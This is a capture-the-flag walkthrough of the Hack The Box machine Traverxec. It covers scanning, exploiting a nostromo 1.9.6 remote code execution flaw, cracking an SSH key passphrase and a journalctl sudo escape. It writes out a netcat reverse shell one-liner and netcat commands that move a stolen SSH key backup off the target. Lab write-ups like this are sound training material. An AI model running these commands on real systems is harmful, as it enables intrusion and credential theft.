Hackthebox Traverxec Walkthrough

In this article you well learn the following:
- Scanning targets using nmap.
- Enumeration
- Exploit nostromo 1.9.6
- Check nostromo configuration file
- Decrypt ssh private key with john
- Abuse sudo command for root
Port Scanning
$ nmap -Pn -sC -sV -v 10.10.10.165 -oN traverxec.nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open http nostromo 1.9.6
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Edit vhost:
10.10.10.165 traverxec.htb
I started to enumerate web with gobuster
$ gobuster dir -u http://traverxec.htb/ -w /usr/share/wordlists/dirb/common.txt
/css (Status: 301)
/icons (Status: 301)
/img (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/lib (Status: 301)
After enumeration nothing interesting , so i decided to search for exploits for nostromo 1.9.6 and i found an exploit
https://www.rapid7.com/db/modules/exploit/multi/http/nostromo_code_exec
And in exploit-db
https://www.exploit-db.com/exploits/47837
nostromo 1.9.6 – Remote Code Execution
CVE : CVE-2019-1627
I download the exploit and run it

Then i run the exploit again with reverse shell
python 47837.py 10.10.10.165 80 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 9090 >/tmp/f"

The nostromo app in /var/nostromo , and config in /var/nostromo/conf , so i read nhttpd.conf

There’s 3 main things to look on it
serveradmin [email protected]
homedirs /home
homedirs_public public_www
After some digging it’s seems there’s a public folder in /home/david , named public_www , i tried to run ls in that path
$ ls -al /home/david/public_www

And i got a result , there’s protected-file-area directory

there’s a backup ssh comprised file:
backup-ssh-identity-files.tgz
So i moved it to my machine with netcat
nc -lvp 9091 > backup-ssh-identity-files.tgz
nc 10.10.14.5 9091 < /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz


To decompress it
$ gunzip -d backup-ssh-identity-files.tgz
$ tar xvf backup-ssh-identity-files.tar

After checking ssh private key , it’s encrypted

So to decrypt it and got the passphrase we need to run
$ ssh2john id_rsa > david-ssh.key
$ john --wordlist=/root/Desktop/HTB/rockyou.txt david-ssh.key


I got the passphrase , then ssh to user david and got user flag
$ ssh -i id_rsa [email protected]


After few enumeration there’s a /bin directory in david home and it had server-stats.sh , i read it

It seems david has sudo command
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
To check it , i run the script if it ask for password then it’s not valid sudo command

And it’s run normally , then i tried to search for journalctl, and there’s sudo privilege escalation
https://gtfobins.github.io/gtfobins/journalctl/
After a few tries i found the solution
-n --lines[=INTEGER] Number of journal entries to show
If we make the terminal smaller than the length of longest line we can go to the restricted environments , and escape it and get root privilege
This invokes the default pager, which is likely to be less, other functions may apply. It can be used to break out from restricted environments by spawning an interactive system shell
GTFOBins
So i tried it , and it work got root privilage




Got root flag
That’s all folks , hope you enjoyed this writeup.